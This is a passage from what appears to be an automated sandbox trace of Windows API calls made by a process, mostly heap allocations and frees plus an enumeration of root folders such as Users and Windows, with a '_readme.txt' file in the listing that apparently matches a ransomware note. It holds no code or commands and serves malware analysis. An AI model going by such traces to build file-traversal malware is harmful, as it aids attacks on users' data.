lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3203a90 | out: hHeap=0x620000) returned 1 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320fbc8 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f7a0 | out: hHeap=0x620000) returned 1 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f880 | out: hHeap=0x620000) returned 1 [0142.635] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f880 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f7a0 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272388 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f7a0 | out: hHeap=0x620000) returned 1 [0142.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f880 | out: hHeap=0x620000) returned 1 [0142.635] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc70d1c30, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc70d1c30, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0142.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a78 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.636] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x3255a48 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f880 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac2040 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1410 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1ca8 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f7a0 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32722a8 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21f8 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320fce0 | out: hHeap=0x620000) returned 1 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f50 | out: hHeap=0x620000) returned 1 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1988 | out: hHeap=0x620000) returned 1 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1910 | out: hHeap=0x620000) returned 1 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320fbc8 | out: hHeap=0x620000) returned 1 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272388 | out: hHeap=0x620000) returned 1 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a78 | out: hHeap=0x620000) returned 1 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3282668 | out: hHeap=0x620000) returned 1 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a78 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.636] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fe8 [0142.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283bf8 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fe8 | out: hHeap=0x620000) returned 1 [0142.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.636] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2009190, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc2009190, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc2009190, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.637] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.637] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x214) returned 0x321efd0 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272388 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1988 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f50 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac12d0 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1fa0 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272350 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723f8 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1960 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fe8 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f880 | out: hHeap=0x620000) returned 1 [0142.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac2040 | out: hHeap=0x620000) returned 1 [0142.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fa0 | out: hHeap=0x620000) returned 1 [0142.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1410 | out: hHeap=0x620000) returned 1 [0142.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1ca8 | out: hHeap=0x620000) returned 1 [0142.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f7a0 | out: hHeap=0x620000) returned 1 [0142.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32722a8 | out: hHeap=0x620000) returned 1 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21f8 | out: hHeap=0x620000) returned 1 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a78 | out: hHeap=0x620000) returned 1 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283bf8 | out: hHeap=0x620000) returned 1 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1910 | out: hHeap=0x620000) returned 1 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3255a48 | out: hHeap=0x620000) returned 1 [0142.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.638] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89d0330, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc89d0330, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc89d0330, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.638] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89d0330, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc89d0330, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc89d0330, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.638] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32722a8 [0142.638] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32722a8 | out: hHeap=0x620000) returned 1 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.640] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.641] 